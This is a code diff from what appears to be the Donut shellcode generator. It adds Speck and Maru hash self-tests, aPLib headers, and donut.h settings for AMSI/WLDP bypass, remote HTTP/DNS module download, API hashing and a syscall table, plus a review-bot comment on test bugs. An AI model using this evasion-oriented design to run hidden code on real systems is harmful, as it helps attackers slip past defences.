140 { 0x74, 0x65, 0x72, 0x3b,
141 0x2d, 0x43, 0x75, 0x74 };
142
143 // 64-bit cipher text
144 uint8_t cipher64[8]=
145 { 0x48, 0xa5, 0x6f, 0x8c,
146 0x8b, 0x02, 0x4e, 0x45 };
147
148 // 64-bit type
149 typedef union _w64_t {
150 uint8_t b[8];
151 uint32_t w[2];
152 uint64_t q;
153 } w64;
154
155 // ******************************
156 // test vectors for Maru hash
157 //
158 typedef struct _maru_tv_t {
159 const char *str;
160 uint64_t hash;
161 } maru_tv_t;
162
163 maru_tv_t maru_tv[MARU_MAX_STR] = {
164 {"", 0x8E63EC0D29F27D07},
165 {"C", 0x19C7DC40E602AC8E},
166 {"73", 0x5197B6ACC87EF423},
167 {"NY4", 0x3BC2F21615A953C5},
168 {"X9TM", 0xC9EC6B72BF5273D6},
169 {"H339P", 0x6B60077EF084C1E2},
170 {"TMCT3N", 0x33374AA7206F00FC},
171 {"RF4M66W", 0xF7B91D9C42A886C5},
172 {"XTCX43NN", 0x615D4FB7A2246376},
173 {"C6XCYXF9F", 0x80D4B6324A24CEB6},
174 {"RR3TN69H9M", 0xE6369CFF4F98B4F8},
175 {"F9C9YNTMYYR", 0xF173A1158A4D80A9},
176 {"FPW779364RYH", 0x517A4E86DF00BB97},
177 {"WHN4N9CT7YF7C", 0xFCBA9541CD7765A5},
178 {"633H6CTRC64FWR", 0x79EEC9CC663EDDC1},
179 {"WPNX66993HPWNYX", 0x139CFA0D49AF17DC},
180 {"H66C3Y9F677WP96N", 0xEFF27A644D53171A},
181 {"TY3YX7N3FPN7YNWT4", 0x5361C6DBF89D0B47},
182 {"YF496N7XH4HYHRN6WM", 0x71451CE666D8E9A4},
183 {"TWP4M739RYTCTFMMCC7", 0xC17E5C46E2BEAD},
184 {"4FHNWP4MR9TT9Y6HYWCX", 0x1E40C5A64B8ECE85},
185 {"TCMHT3TF7T4TRCWCF6RPF", 0xD02290F438AA84A9},
186 {"4WW63CTHPR36MN7P3WXTHT", 0x79FBDCFC2ECE09FF},
187 {"NFFMNM3CF3NXY6P9MCC7YPX", 0x10B7C56D102D623B},
188 {"R74YN9MX7PMP364HYNYCR9FY", 0x86EC8AA614611458},
189 {"94X3NFT7W4FPTX3MCTY99HMPR", 0x7929169892B04FC1},
190 {"66R379FR67W7T7H79WTCF37H6Y", 0xBEA85FD3754045D8},
191 {"4F6HFPT3NRN7WPP766RFCXR43RX", 0x76E410266A6830A},
192 {"HP374TWWPMYRTTWC6Y6T4C4T4HP4", 0x6A7509443FF48F74},
193 {"TTX3966P63XPYMPM6XM994TX9X9X3", 0xA8AFC37C137AE14},
194 {"34TX7XRX4WH7T6PW439TNRY77FHPT4", 0xE64667746B53394},
195 {"P3WRCCT4PXN3H6PMNR3YXY6X379MTXH", 0xCE981B296791D5C7},
196 {"73YF99H9XXTYC6XF6CXTPCM4YXYN33R4", 0xE39B1FC51BED4BA9},
197 {"T7R3PR43C93MH4TRT6M644T7RCXMX4WM6", 0xE25C6B39CB28FDB5},
198 {"44M69YYFX3C9H9M6P46933PW34RRCM9NXX", 0x84DBD675600E871E},
199 {"7TW7P76CXMFC3HFTFHMWXWW33TWTPT6PYP3", 0xE00F660E699F9231},
200 {"6CH6W7WYHH7HXT7RTMW4FRCN39HR997F6FWN", 0x32AEC917C63A878E},
201 {"WF3HNPT37XPPXYFXR447F7RWF3C69H74CT6R6", 0x4B4FCD2604496365},
202 {"WR9CCHH9NNNXCXYMXMFFW6YYC7449M4HYXM4MC", 0x330DA5A18A58C952},
203 {"C9993Y93PTWYRNP46PYN763RNFYP4PN4WWHR9CM", 0x5249D03CD52C71DB},
204 {"XNPXCY47FWWMTFF6R7RWNX79MC4YN43M9RYCC4RX", 0xF11E92E74F70C4F4},
205 {"3RPX6MFNCWPMPT3M467HWCYCHH9PM7R6MFWXYXNTN", 0x86C8BD9789AA71BE},
206 {"633MWRYMCYF3TTCRP6HXTR9TTX43T3MYXPPWMWFMF6", 0xA5F12FC7418615CC},
207 {"RW7NN6Y4779639NNTHN6TR939F3799FNWTH4FP46RNY", 0x37EADA4549B0B96F},
208 {"MCTRH9PTXRXFPMYRP9Y4TC4PCRX4W9YFCW649R3YN33W", 0x8E5BADDF84BB9779},
209 {"F7RT3H36PNH6CF9TWCRNYMFWX9M9MTTNY6C7X43HC4PN9", 0x8040D317E8DCD294},
210 {"7HTCNCTNHRFY6HCRTYPTHYP3H9T4PR96RWRY7NRPTMH936", 0x151FB43ECC51AFA1},
211 {"NYRMPMYCWXTPRCYM9TX6Y4XTMY9RT3PHH49PP36H7XR7WPN", 0x650A8724A052DFC5},
212 {"6PX3XWM3X973693M4F373R3N9FNC4CCTXN3CTTYMP3NW4C49", 0x9E48D8154522BFDD},
213 {"74RNX9MTPW7FNY9WMTXNPPRMR97PRPPRCN3CMHPNWFFW44R3C", 0xDC1ABDA05084DCBA},
214 {"47NC63XRTXXPWHN76H9XF9R7TTHWR6T7XMF9TMCHP4FX4WCYTT", 0x5DC075A21ECF2DD8},
215 {"TYMXHXC4N6XXTR4T7X37PHWTYXFF9M7MXP6477RW4FM7P9PFXFR", 0x2CD151D5D71FA785},
216 {"MRPW7NCXPT4N7YN3WN7P9WYNY3PPR464WR7P7PP37MXFF9FC7WTH", 0x7B88469D5AFE14D9},
217 {"9XW6RYX6NTYC4NCRR7YRTWM7HWNFXRT4P396CYMFPRNTRW3X69R39", 0x81E069528C3C9BEE},
218 {"9NMRWF4W34MHWTPP74RY34YWMT94H76HTRX34MR7C9MF696M3TXMN3", 0x4D19A0CB3BC48BFF},
219 {"HF6FM9RMT3NPMR37TX3FPTFYRFNXTMHWTF7WN94YNP4TMP3FNHM3N9F", 0x30CEBE63BE4E30F1},
220 {"NW7CCWFTTNFPMTY3H6X96HX6MXY67W3RPTRCCWHWPYPC7PPRF74PH7RC", 0x64F3DF1E551B22BE},
221 {"HFH43PM9TNCCW79XCMW79HYCN4HY6MT9MFFRYRXYX4H3P9T9FHF6NWC3C", 0xEF36678895FBB3A8},
222 {"N7WH9WYMNHYY3C3RRFTW3RNYH3C646C97FTPT3MH7TMW6MTC4PT44NWCWH", 0x1B75D90E82D98E1D},
223 {"663F4T7PMWN996R9FYWRY3Y33HCNFH6PRWF9TPHN363YFFF6C9CHTP3XNXP", 0x25767AD747B833D6},
224 {"3P7934TX6CFHPM6TWY6H4CXT47P4XRMFTPNMCFP9H9F4MPFWWF9XRMPHFCYX", 0x1F3E15CB56A60E93},
225 {"WW6YN7NXTH9TRT4PYW9W3WTNP9XMHP6Y3NPX7R93Y763M9HRHWTN93W3M9WX3", 0x744735578C4F6EF2},
226 {"HT6R4P6P7T4YFYYX3H3F49XYMPCPMWNT6R3PHTM47PTHTRCN9XMFHHYTH7TMPY", 0x559EA0D5309795E6},
227 {"NHP9Y96YYF44H7NN33WYYC364CY3W4FNF6F7WTHN6WFF6RXXRWNRFF4T9XF934N", 0xBE7F06CC36982F52},
228 };
229
230 void bin2hex(const char *str, void *bin, int len) {
231 int i;
232 uint8_t *p = (uint8_t*)bin;
233
234 printf("%s[%i] = { ", str, len);
235
236 for(i=0;i<len;i++) {
237 printf("0x%02x", p[i]);
238 if((i+1) != len) putchar(',');
239 }
240 printf(" };\n");
241 }
242
243 // returns 1 on success else <=0
244 static int CreateRandom(void *buf, uint64_t len) {
245
246 #if defined(WINDOWS)
247 HCRYPTPROV prov;
248 int ok;
249
250 // 1. acquire crypto context
251 if(!CryptAcquireContext(
252 &prov, NULL, NULL,
253 PROV_RSA_AES,
254 CRYPT_VERIFYCONTEXT | CRYPT_SILENT)) return 0;
255
256 ok = (int)CryptGenRandom(prov, (DWORD)len, buf);
257 CryptReleaseContext(prov, 0);
258
259 return ok;
260 #else
261 int fd;
262 uint64_t r=0;
263 uint8_t *p=(uint8_t*)buf;
264
265 fd = open("/dev/urandom", O_RDONLY);
266
267 if(fd > 0) {
268 for(r=0; r<len; r++, p++) {
269 if(read(fd, p, 1) != 1) break;
270 }
271 close(fd);
272 }
273 return r == len;
274 #endif
275 }
276
277 // Generate a random string, not exceeding MARU_MAX_STR bytes
278 // tbl is from https://stackoverflow.com/a/27459196
279 static int GenRandomString(void *output, uint64_t len) {
280 uint8_t rnd[MARU_MAX_STR];
281 int i;
282 char tbl[]="HMN34P67R9TWCXYF";
283 char *str = (char*)output;
284
285 if(len > (MARU_MAX_STR - 1)) return 0;
286
287 // generate MARU_MAX_STR random bytes
288 if(!CreateRandom(rnd, MARU_MAX_STR)) return 0;
289
290 // generate a string using unambiguous characters
291 for(i=0; i<len; i++) {
292 str[i] = tbl[rnd[i] % (sizeof(tbl) - 1)];
293 }
294 str[i] = 0;
295 return 1;
296 }
297
298 void gen_maru_tv(void) {
299 char str[MARU_MAX_STR+1];
300 w64 h, iv;
301 int i;
302
303 // copy 64-bit IV (just using the speck ciphertext)
304 memcpy(iv.b, cipher64, 8);
305
306 // create vectors
307 for(i=0; i<MARU_MAX_STR; i++) {
308 // generate a random string
309 memset(str, 0, sizeof(str));
310 GenRandomString(str, i);
311
312 // derive a hash for string
313 h.q = maru(str, iv.q);
314
315 printf("{\"%s\", 0x%llX},\n", str, h.q);
316 }
317 }
113318
114319 int main(int argc, char *argv[]) {
115
116 uint64_t ulDllHash, ulApiHash, iv;
117 char *api, *dll;
118
119 if(argc != 4) {
120 printf("\nusage: maru <iv> <dll> <api>\n");
121 return 0;
122 }
123
124 // convert hexadecimal IV to binary
125 iv = strtoull(argv[1], NULL, 16);
126 dll = argv[2];
127 api = argv[3];
128
129 printf("\nIV : %p\n", (void*)iv);
130
131 ulDllHash = maru(dll, iv);
132 printf("DLL : %p\n", (void*)ulDllHash);
133
134 ulApiHash = maru(api, iv) + ulDllHash;
135 printf("API : %p\n", (void*)ulApiHash);
136
320 int i, equ;
321 w64 p, c, h, iv;
322
323 // copy 64-bit plaintext
324 memcpy(p.b, plain64, 8);
325
326 // encrypt in-place with 128-bit key
327 c.q = speck(key64, p.q);
328 equ = (memcmp(c.b, cipher64, 8)==0);
329 printf("SPECK-64/128 Test : %s\n\n", equ ? "OK" : "FAILED");
330
331 // set iv
332 memcpy(iv.b, cipher64, 8);
333
334 // compare test vectors
335 for(i=0; i<MARU_MAX_STR; i++) {
336 h.q = maru(maru_tv[i].str, iv.q);
337
338 if(maru_tv[i].hash != h.q) {
339 printf("Maru test # %i failed.\n", i);
340 break;
341 }
342 }
343 if(i == MARU_MAX_STR) printf("Maru tests OK\n");
137344 return 0;
138345 }
139346 #endif
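Review bot: The rewritten TEST `main` returns 0 whether or not the SPECK-64/128 and Maru vectors match, so a script or CI job running this self-test cannot detect a regression in the cipher or hash code from the exit status; ending with `return (equ && i == MARU_MAX_STR) ? 0 : 1;` would make failures visible. In `gen_maru_tv` the result of `GenRandomString(str, i)` is ignored, so if `CreateRandom` fails the zeroed `str` is hashed and printed as though it were a valid vector. In the non-Windows branch of `CreateRandom`, `if(fd > 0)` treats a valid descriptor 0 as a failure; `fd >= 0` is the usual check. The `printf("{\"%s\", 0x%llX},\n", str, h.q)` call passes a `uint64_t` to `%llX`; `"0x%" PRIX64` would be portable, and `<inttypes.h>` is already included in this block.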
Binary diff not shown
Binary diff not shown
Binary diff not shown
Binary diff not shown
Binary diff not shown
Binary diff not shown
Binary diff not shown
Binary diff not shown
Binary diff not shown
0 /*
1 * aPLib compression library - the smaller the better :)
2 *
3 * ELF 64-bit format header file
4 *
5 * Copyright (c) 1998-2014 Joergen Ibsen
6 * All Rights Reserved
7 *
8 * http://www.ibsensoftware.com/
9 */
10
11 #ifndef APLIB_H_INCLUDED
12 #define APLIB_H_INCLUDED
13
14 #ifdef __cplusplus
15 extern "C" {
16 #endif
17
18 #ifndef APLIB_ERROR
19 # define APLIB_ERROR ((unsigned int) (-1))
20 #endif
21
22 unsigned int aP_pack(const void *source,
23 void *destination,
24 unsigned int length,
25 void *workmem,
26 int (*callback)(unsigned int, unsigned int, unsigned int, void *),
27 void *cbparam);
28
29 unsigned int aP_workmem_size(unsigned int inputsize);
30
31 unsigned int aP_max_packed_size(unsigned int inputsize);
32
33 unsigned int aP_depack_asm(const void *source, void *destination);
34
35 unsigned int aP_depack_asm_fast(const void *source, void *destination);
36
37 unsigned int aP_depack_asm_safe(const void *source,
38 unsigned int srclen,
39 void *destination,
40 unsigned int dstlen);
41
42 unsigned int aP_crc32(const void *source, unsigned int length);
43
44 unsigned int aPsafe_pack(const void *source,
45 void *destination,
46 unsigned int length,
47 void *workmem,
48 int (*callback)(unsigned int, unsigned int, unsigned int, void *),
49 void *cbparam);
50
51 unsigned int aPsafe_check(const void *source);
52
53 unsigned int aPsafe_get_orig_size(const void *source);
54
55 unsigned int aPsafe_depack(const void *source,
56 unsigned int srclen,
57 void *destination,
58 unsigned int dstlen);
59
60 #ifdef __cplusplus
61 } /* extern "C" */
62 #endif
63
64 #endif /* APLIB_H_INCLUDED */
0 /*
1 * aPLib compression library - the smaller the better :)
2 *
3 * C depacker, header file
4 *
5 * Copyright (c) 1998-2014 Joergen Ibsen
6 * All Rights Reserved
7 *
8 * http://www.ibsensoftware.com/
9 */
10
11 #ifndef DEPACK_H_INCLUDED
12 #define DEPACK_H_INCLUDED
13
14 #ifdef __cplusplus
15 extern "C" {
16 #endif
17
18 #ifndef APLIB_ERROR
19 # define APLIB_ERROR ((unsigned int) (-1))
20 #endif
21
22 /* function prototype */
23 unsigned int aP_depack(const void *source, void *destination);
24
25 #ifdef __cplusplus
26 } /* extern "C" */
27 #endif
28
29 #endif /* DEPACK_H_INCLUDED */
3131 #ifndef DONUT_H
3232 #define DONUT_H
3333
34 #ifdef _MSC_VER
35 #define _CRT_SECURE_NO_WARNINGS
36 #define _CRT_NONSTDC_NO_DEPRECATE
37 #endif
38
3439 #include <stdint.h>
3540 #include <stdio.h>
3641 #include <stdlib.h>
3742 #include <string.h>
43 #include <ctype.h>
3844 #include <sys/stat.h>
3945 #include <inttypes.h>
4046 #include <fcntl.h>
47 #include <limits.h>
48 #include <wchar.h>
4149
4250 #if defined(_WIN32) || defined(_WIN64)
4351 #define WINDOWS
4452 #include <windows.h>
45 #ifndef PAYLOAD_H
53 #ifndef LOADER_H
4654 #include "mmap.h"
4755 #endif
4856 #if defined(_MSC_VER)
4957 #pragma comment(lib, "advapi32.lib")
58 #pragma comment(lib, "user32.lib")
59 #define strcasecmp stricmp
5060 #endif
5161 #else
5262 #define LINUX
5666 #include "pe.h"
5767 #endif
5868
59 #ifndef PAYLOAD_H
69 #ifndef LOADER_H
6070
6171 #if defined(DEBUG)
6272 #define DPRINT(...) { \
7080
7181 #endif
7282
73 #if !defined(NOCRYPTO)
7483 #include "hash.h" // api hashing
7584 #include "encrypt.h" // symmetric encryption of instance+module
85 #include "format.h" // output format for loader
86 #include "aplib.h" // aPLib compression for both windows + linux
87
88 #ifndef MAX_PATH
89 #define MAX_PATH 260
7690 #endif
7791
7892 #if !defined(WINDOWS)
93107 } GUID;
94108 #endif
95109
96 #define DONUT_KEY_LEN CIPHER_KEY_LEN
97 #define DONUT_BLK_LEN CIPHER_BLK_LEN
98
99 #define DONUT_ERROR_SUCCESS 0
100 #define DONUT_ERROR_FILE_NOT_FOUND 1
101 #define DONUT_ERROR_FILE_EMPTY 2
102 #define DONUT_ERROR_FILE_ACCESS 3
103 #define DONUT_ERROR_FILE_INVALID 4
104 #define DONUT_ERROR_NET_PARAMS 5
105 #define DONUT_ERROR_NO_MEMORY 6
106 #define DONUT_ERROR_INVALID_ARCH 7
107 #define DONUT_ERROR_INVALID_URL 8
108 #define DONUT_ERROR_URL_LENGTH 9
109 #define DONUT_ERROR_INVALID_PARAMETER 10
110 #define DONUT_ERROR_RANDOM 11
111 #define DONUT_ERROR_DLL_FUNCTION 12
112 #define DONUT_ERROR_ARCH_MISMATCH 13
113 #define DONUT_ERROR_DLL_PARAM 14
114 #define DONUT_ERROR_BYPASS_INVALID 15
110 #define DONUT_KEY_LEN 16
111 #define DONUT_BLK_LEN 16
112
113 #define DONUT_ERROR_OK 0
114 #define DONUT_ERROR_FILE_NOT_FOUND 1
115 #define DONUT_ERROR_FILE_EMPTY 2
116 #define DONUT_ERROR_FILE_ACCESS 3
117 #define DONUT_ERROR_FILE_INVALID 4
118 #define DONUT_ERROR_NET_PARAMS 5
119 #define DONUT_ERROR_NO_MEMORY 6
120 #define DONUT_ERROR_INVALID_ARCH 7
121 #define DONUT_ERROR_INVALID_URL 8
122 #define DONUT_ERROR_URL_LENGTH 9
123 #define DONUT_ERROR_INVALID_PARAMETER 10
124 #define DONUT_ERROR_RANDOM 11
125 #define DONUT_ERROR_DLL_FUNCTION 12
126 #define DONUT_ERROR_ARCH_MISMATCH 13
127 #define DONUT_ERROR_DLL_PARAM 14
128 #define DONUT_ERROR_BYPASS_INVALID 15
129 #define DONUT_ERROR_INVALID_FORMAT 16
130 #define DONUT_ERROR_INVALID_ENGINE 17
131 #define DONUT_ERROR_COMPRESSION 18
132 #define DONUT_ERROR_INVALID_ENTROPY 19
133 #define DONUT_ERROR_MIXED_ASSEMBLY 20
134 #define DONUT_ERROR_HEADERS_INVALID 21
135 #define DONUT_ERROR_DECOY_INVALID 22
115136
116137 // target architecture
117 #define DONUT_ARCH_ANY -1 // just for vbs,js and xsl files
118 #define DONUT_ARCH_X86 1 // x86
119 #define DONUT_ARCH_X64 2 // AMD64
120 #define DONUT_ARCH_X84 3 // AMD64 + x86
138 #define DONUT_ARCH_ANY -1 // for vbs and js files
139 #define DONUT_ARCH_X86 1 // x86
140 #define DONUT_ARCH_X64 2 // AMD64
141 #define DONUT_ARCH_X84 3 // x86 + AMD64
121142
122143 // module type
123 #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method
124 #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided
125 #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional
126 #define DONUT_MODULE_EXE 4 // Unmanaged EXE
127 #define DONUT_MODULE_VBS 5 // VBScript
128 #define DONUT_MODULE_JS 6 // JavaScript or JScript
129 #define DONUT_MODULE_XSL 7 // XSL with JavaScript/JScript or VBscript embedded
144 #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method
145 #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided
146 #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional
147 #define DONUT_MODULE_EXE 4 // Unmanaged EXE
148 #define DONUT_MODULE_VBS 5 // VBScript
149 #define DONUT_MODULE_JS 6 // JavaScript or JScript
150
151 // format type
152 #define DONUT_FORMAT_BINARY 1
153 #define DONUT_FORMAT_BASE64 2
154 #define DONUT_FORMAT_C 3
155 #define DONUT_FORMAT_RUBY 4
156 #define DONUT_FORMAT_PYTHON 5
157 #define DONUT_FORMAT_POWERSHELL 6
158 #define DONUT_FORMAT_CSHARP 7
159 #define DONUT_FORMAT_HEX 8
160
161 // compression engine
162 #define DONUT_COMPRESS_NONE 1
163 #define DONUT_COMPRESS_APLIB 2
164 #define DONUT_COMPRESS_LZNT1 3 // COMPRESSION_FORMAT_LZNT1
165 #define DONUT_COMPRESS_XPRESS 4 // COMPRESSION_FORMAT_XPRESS
166
167 // entropy level
168 #define DONUT_ENTROPY_NONE 1 // don't use any entropy
169 #define DONUT_ENTROPY_RANDOM 2 // use random names
170 #define DONUT_ENTROPY_DEFAULT 3 // use random names + symmetric encryption
171
172 // misc options
173 #define DONUT_OPT_EXIT_THREAD 1 // after the main shellcode ends, return to the caller which eventually calls RtlExitUserThread
174 #define DONUT_OPT_EXIT_PROCESS 2 // after the main shellcode ends, call RtlExitUserProcess to terminate host process
130175
131176 // instance type
132 #define DONUT_INSTANCE_PIC 1 // Self-contained
133 #define DONUT_INSTANCE_URL 2 // Download from remote server
134
135 // AMSI/WLDP options
136 #define DONUT_BYPASS_SKIP 1 // Disables bypassing AMSI/WDLP
137 #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running
138 #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running
139
140 // apparently C# can support 2^16 or 65,536 parameters
141 // we support up to eight for now :)
142 // Changing these would require updating call_api.asm for unmanaged EXE/DLL
143 #define DONUT_MAX_PARAM 8 // maximum number of parameters passed to method
144 #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names
145 #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance
146 #define DONUT_MAX_URL 256
147 #define DONUT_MAX_MODNAME 8
148 #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok
149 #define DONUT_VER_LEN 32
150 #define DONUT_DOMAIN_LEN 8
177 #define DONUT_INSTANCE_EMBED 1 // Module is embedded
178 #define DONUT_INSTANCE_HTTP 2 // Module is downloaded from remote HTTP/HTTPS server
179 #define DONUT_INSTANCE_DNS 3 // Module is downloaded from remote DNS server
180
181 // AMSI/WLDP level
182 #define DONUT_BYPASS_NONE 1 // Disables bypassing AMSI/WDLP
183 #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running
184 #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running
185
186 // Preserve PE headers options
187 #define DONUT_HEADERS_OVERWRITE 1 // Overwrite PE headers
188 #define DONUT_HEADERS_KEEP 2 // Preserve PE headers
189
190 #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names
191 #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance
192 #define DONUT_MAX_MODNAME 8
193 #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok
194 #define DONUT_VER_LEN 32
195 #define DONUT_DOMAIN_LEN 8
151196
152197 #define DONUT_RUNTIME_NET2 "v2.0.50727"
153198 #define DONUT_RUNTIME_NET4 "v4.0.30319"
163208 #define COMBASE_DLL "combase.dll"
164209 #define USER32_DLL "user32.dll"
165210 #define SHLWAPI_DLL "shlwapi.dll"
211 #define SHELL32_DLL "shell32.dll"
166212
167213 // Per the ECMA spec, the section data looks like this:
168214 // taken from https://github.com/dotnet/coreclr/
179225 //
180226 typedef struct _file_info_t {
181227 int fd;
182 uint64_t size;
183 uint8_t *map;
228 uint32_t len, zlen;
229 uint8_t *data, *zdata;
184230
185231 // the following are set for unmanaged or .NET PE/DLL files
186232 int type;
194240 } API_IMPORT, *PAPI_IMPORT;
195241
196242 typedef struct _DONUT_CRYPT {
197 BYTE mk[DONUT_KEY_LEN]; // master key
198 BYTE ctr[DONUT_BLK_LEN]; // counter + nonce
243 uint8_t mk[DONUT_KEY_LEN]; // master key
244 uint8_t ctr[DONUT_BLK_LEN]; // counter + nonce
199245 } DONUT_CRYPT, *PDONUT_CRYPT;
200
246
201247 // everything required for a module goes in the following structure
202248 typedef struct _DONUT_MODULE {
203 DWORD type; // EXE, DLL, JS, VBS, XSL
204 WCHAR runtime[DONUT_MAX_NAME]; // runtime version for .NET EXE/DLL
205 WCHAR domain[DONUT_MAX_NAME]; // domain name to use for .NET EXE/DLL
206 WCHAR cls[DONUT_MAX_NAME]; // name of class and optional namespace for .NET EXE/DLL
207 WCHAR method[DONUT_MAX_NAME]; // name of method to invoke for .NET DLL or api for unmanaged DLL
208 DWORD param_cnt; // number of parameters for DLL/EXE
209 WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]; // string parameters for DLL/EXE
210 CHAR sig[DONUT_MAX_NAME]; // random string to verify decryption
211 ULONG64 mac; // to verify decryption was ok
212 ULONG64 len; // size of EXE/DLL/XSL/JS/VBS file
213 BYTE data[4]; // data of EXE/DLL/XSL/JS/VBS file
249 int type; // EXE/DLL/JS/VBS
250 int thread; // run entrypoint of unmanaged EXE as a thread
251 int compress; // indicates engine used for compression
252
253 char runtime[DONUT_MAX_NAME]; // runtime version for .NET EXE/DLL
254 char domain[DONUT_MAX_NAME]; // domain name to use for .NET EXE/DLL
255 char cls[DONUT_MAX_NAME]; // name of class and optional namespace for .NET EXE/DLL
256 char method[DONUT_MAX_NAME]; // name of method to invoke for .NET DLL or api for unmanaged DLL
257
258 char args[DONUT_MAX_NAME]; // string arguments for both managed and unmanaged DLL/EXE
259 int unicode; // convert param to unicode for unmanaged DLL function
260
261 char sig[DONUT_SIG_LEN]; // string to verify decryption
262 uint64_t mac; // hash of sig, to verify decryption was ok
263
264 uint32_t zlen; // compressed size of EXE/DLL/JS/VBS file
265 uint32_t len; // real size of EXE/DLL/JS/VBS file
266 uint8_t data[4]; // data of EXE/DLL/JS/VBS file
214267 } DONUT_MODULE, *PDONUT_MODULE;
215268
216269 // everything required for an instance goes into the following structure
217270 typedef struct _DONUT_INSTANCE {
218271 uint32_t len; // total size of instance
219 DONUT_CRYPT key; // decrypts instance
272 DONUT_CRYPT key; // decrypts instance if encryption enabled
220273
221274 uint64_t iv; // the 64-bit initial value for maru hash
222275
223276 union {
224 uint64_t hash[64]; // holds up to 64 api hashes
225 void *addr[64]; // holds up to 64 api addresses
226 // include prototypes only if header included from payload.h
227 #ifdef PAYLOAD_H
277 uint64_t hash[57]; // holds up to 57 api hashes
278 void *addr[57]; // holds up to 57 api addresses
279 // include prototypes only if header included from loader.h
280 #ifdef LOADER_H
228281 struct {
229282 // imports from kernel32.dll or kernelbase.dll
230 LoadLibraryA_t LoadLibraryA;
231 GetProcAddress_t GetProcAddress;
232 GetModuleHandleA_t GetModuleHandleA;
233 VirtualAlloc_t VirtualAlloc; // required to allocate RW memory for instance
234 VirtualFree_t VirtualFree;
235 VirtualQuery_t VirtualQuery;
236 VirtualProtect_t VirtualProtect;
237 Sleep_t Sleep;
238 MultiByteToWideChar_t MultiByteToWideChar;
239 GetUserDefaultLCID_t GetUserDefaultLCID;
283 LoadLibraryA_t LoadLibraryA;
284 GetProcAddress_t GetProcAddress;
285 GetModuleHandleA_t GetModuleHandleA;
286 VirtualAlloc_t VirtualAlloc;
287 VirtualFree_t VirtualFree;
288 Sleep_t Sleep;
289 MultiByteToWideChar_t MultiByteToWideChar;
290 GetUserDefaultLCID_t GetUserDefaultLCID;
291 CreateThread_t CreateThread;
292 CreateFileA_t CreateFileA;
293 GetThreadContext_t GetThreadContext;
294 GetCurrentThread_t GetCurrentThread;
295 GetCurrentProcess_t GetCurrentProcess;
296 GetCommandLineA_t GetCommandLineA;
297 GetCommandLineW_t GetCommandLineW;
298 HeapAlloc_t HeapAlloc;
299 HeapReAlloc_t HeapReAlloc;
300 GetProcessHeap_t GetProcessHeap;
301 HeapFree_t HeapFree;
302 GetLastError_t GetLastError;
303
304 // imports from shell32.dll
305 CommandLineToArgvW_t CommandLineToArgvW;
240306
241307 // imports from oleaut32.dll
242 SafeArrayCreate_t SafeArrayCreate;
243 SafeArrayCreateVector_t SafeArrayCreateVector;
244 SafeArrayPutElement_t SafeArrayPutElement;
245 SafeArrayDestroy_t SafeArrayDestroy;
246 SafeArrayGetLBound_t SafeArrayGetLBound;
247 SafeArrayGetUBound_t SafeArrayGetUBound;
248 SysAllocString_t SysAllocString;
249 SysFreeString_t SysFreeString;
250 LoadTypeLib_t LoadTypeLib;
308 SafeArrayCreate_t SafeArrayCreate;
309 SafeArrayCreateVector_t SafeArrayCreateVector;
310 SafeArrayPutElement_t SafeArrayPutElement;
311 SafeArrayDestroy_t SafeArrayDestroy;
312 SafeArrayGetLBound_t SafeArrayGetLBound;
313 SafeArrayGetUBound_t SafeArrayGetUBound;
314 SysAllocString_t SysAllocString;
315 SysFreeString_t SysFreeString;
316 LoadTypeLib_t LoadTypeLib;
251317
252318 // imports from wininet.dll
253 InternetCrackUrl_t InternetCrackUrl;
254 InternetOpen_t InternetOpen;
255 InternetConnect_t InternetConnect;
256 InternetSetOption_t InternetSetOption;
257 InternetReadFile_t InternetReadFile;
258 InternetCloseHandle_t InternetCloseHandle;
259 HttpOpenRequest_t HttpOpenRequest;
260 HttpSendRequest_t HttpSendRequest;
261 HttpQueryInfo_t HttpQueryInfo;
319 InternetCrackUrl_t InternetCrackUrl;
320 InternetOpen_t InternetOpen;
321 InternetConnect_t InternetConnect;
322 InternetSetOption_t InternetSetOption;
323 InternetReadFile_t InternetReadFile;
324 InternetCloseHandle_t InternetCloseHandle;
325 InternetQueryDataAvailable_t InternetQueryDataAvailable;
326 HttpOpenRequest_t HttpOpenRequest;
327 HttpSendRequest_t HttpSendRequest;
328 HttpQueryInfo_t HttpQueryInfo;
262329
263330 // imports from mscoree.dll
264 CorBindToRuntime_t CorBindToRuntime;
265 CLRCreateInstance_t CLRCreateInstance;
331 CorBindToRuntime_t CorBindToRuntime;
332 CLRCreateInstance_t CLRCreateInstance;
266333
267334 // imports from ole32.dll
268 CoInitializeEx_t CoInitializeEx;
269 CoCreateInstance_t CoCreateInstance;
270 CoUninitialize_t CoUninitialize;
335 CoInitializeEx_t CoInitializeEx;
336 CoCreateInstance_t CoCreateInstance;
337 CoUninitialize_t CoUninitialize;
338
339 // imports from ntdll.dll
340 RtlEqualUnicodeString_t RtlEqualUnicodeString;
341 RtlEqualString_t RtlEqualString;
342 RtlUnicodeStringToAnsiString_t RtlUnicodeStringToAnsiString;
343 RtlInitUnicodeString_t RtlInitUnicodeString;
344 RtlExitUserThread_t RtlExitUserThread;
345 RtlExitUserProcess_t RtlExitUserProcess;
346 RtlCreateUnicodeString_t RtlCreateUnicodeString;
347 RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
348 RtlDecompressBuffer_t RtlDecompressBuffer;
349 NtContinue_t NtContinue;
350 AddVectoredExceptionHandler_t AddVectoredExceptionHandler;
351 RemoveVectoredExceptionHandler_t RemoveVectoredExceptionHandler;
271352 };
272353 #endif
273354 } api;
355
356 // pointer to syscall table for syswhispers2
357 uint64_t syscall_list;
358
